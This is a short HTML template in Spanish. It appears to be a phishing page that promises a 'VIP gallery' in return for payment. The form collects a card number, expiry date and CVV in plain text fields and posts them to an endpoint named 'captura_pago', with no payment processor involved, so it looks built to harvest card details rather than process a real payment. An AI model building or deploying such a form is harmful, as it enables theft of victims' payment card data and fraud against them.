<form action="/captura_pago" method="POST" class="p-4 bg-dark rounded border border-warning shadow">
    <h5 class="text-warning text-center">CONFIRMACIÓN DE PAGO</h5>
    <p class="small text-center">Para acceder a la galería VIP, pague {{ config.precio }} via {{ config.alias }}</p>
    <input type="text" name="cc" class="form-control mb-3" placeholder="Número de Tarjeta" required>
    <div class="row g-2">
        <div class="col-6"><input type="text" name="exp" class="form-control mb-3" placeholder="MM/AA" required></div>
        <div class="col-6"><input type="text" name="cvv" class="form-control mb-3" placeholder="CVV" required></div>
    </div>
    <button class="btn btn-warning w-100 fw-bold">PROCESAR PAGO</button>
</form>
